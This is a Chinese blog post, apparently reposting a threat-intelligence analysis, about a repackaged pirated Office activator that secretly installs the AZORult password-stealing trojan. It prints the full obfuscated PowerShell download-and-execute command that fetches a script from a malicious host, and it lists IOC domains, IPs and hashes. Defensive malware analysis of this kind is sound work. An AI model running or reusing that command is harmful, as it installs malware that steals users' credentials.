一直被模仿
从未被超越

警惕Office盗版激活工具中隐藏的远程控制木马AZORult

概述

腾讯御见威胁情报中心检测到一款Office激活工具被捆绑传播窃取远程木马AZORult,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马AZORult运行,该木马会搜集敏感信息上传并对电脑进行远程控制。

黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

资源文件

资源文件中包含的lnk文件信息

激活工具运行时从资源文件中释放lnk文件:

Lnk文件执行恶意Powershell脚本代码:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWV4’));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString(‘http://boundertime.ru/pps.ps1’);t $nXR

Lnk指向的代码下载执行Powershell脚本

hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)

Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start

启动程序

远程控制木马AZORult

下载的C:\Users\Public\xxxx.exe为远程控制木马AZORult,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。

发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php

安全建议

1、使用正版软件,尽量不要使用激活、破解工具。

2、不要运行来历不明的程序。

3、使用正规杀毒软件拦截该类木马攻击。

IOCs

2fc6dd175a2288a9c2bed36969e3241d

0c638e0c02e0d1c2a2eb7429a51e13b0

a5898f7aae5d6212fac6447bf801ecc1

eb5b534366f0831b3842abac17346cd5

171a6a149d36d8be2f9d4b35c25a8ec4

03a1845d78da4d5d40ffa6cb3892ce0c

ca21c7ae0664b9b5dc24710b0221d4f4

006f03b07fe27eaf4ab4a866a02dc5dd

d343f4179b00f1f3b2ab7b942648b0c2

10e7859d0dfabae2eebc9605e40612f2

05861babd099e81990cfda340de5de01

4e5b4bc27cad9891c1d11ff6ee1b3581

82b313ceef47bf9aa18e3e0946fca773

IP

92.53.120.114

31.177.78.16

Domain

boundertime.ru

timebound.ug

ghjgfjhjgf.ru

URL

hxxp://timebound.ug/pps.ps1

hxxp://boundertime.ru/pps.ps1

hxxp://ghjgfjhjgf.ru/index.php

赞(15) 打赏
转载请注明出处:胡萝卜周博客 » 警惕Office盗版激活工具中隐藏的远程控制木马AZORult
分享到: 更多 (0)

评论 9

评论前必须登录!

 

  1. #7
    Internet Explorer 11.0 Internet Explorer 11.0 Windows 10 Windows 10

    胡萝卜周老师,你好,是什么版本的?英文版还是各种汉化版的包括汉化便携版?

    chashuanjin2个月前 (04-17)
  2. #6
    Google Chrome 57.0.2987.98 Google Chrome 57.0.2987.98 Windows 10 x64 Edition Windows 10 x64 Edition

    学习一下

    jolinmimi2个月前 (04-13)
  3. #5
    Google Chrome 73.0.3683.103 Google Chrome 73.0.3683.103 Windows 10 x64 Edition Windows 10 x64 Edition

    前几天刚用过一次,咋办,有啥办法验证有没中招么

    u2shana2个月前 (04-12)
  4. #4
    Google Chrome 63.0.3239.132 Google Chrome 63.0.3239.132 Windows 10 x64 Edition Windows 10 x64 Edition

    虽然看不懂技术类文章,但我信任萝卜君博客的激活工具!

    hawk1102个月前 (04-12)
  5. #3
    Google Chrome 57.0.2987.98 Google Chrome 57.0.2987.98 Windows 7 x64 Edition Windows 7 x64 Edition

    上传的其他激活工具应该可用吧?萝卜

    麦大叔2个月前 (04-12)
  6. #2
    Google Chrome 57.0.2987.98 Google Chrome 57.0.2987.98 Windows 7 x64 Edition Windows 7 x64 Edition

    萝卜上传的应该没问题

    麦大叔2个月前 (04-12)
  7. #1
    WebView 4.0 WebView 4.0 Android 9 Android 9

    是这款软件有毒,还是被修改后被注入木马流传?

    Milky-Xie2个月前 (04-12)
    • Google Chrome 73.0.3683.103 Google Chrome 73.0.3683.103 Windows 10 x64 Edition Windows 10 x64 Edition

      修改后的有毒

      萝卜2个月前 (04-12)

互动交流

微信公众号QQ群

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏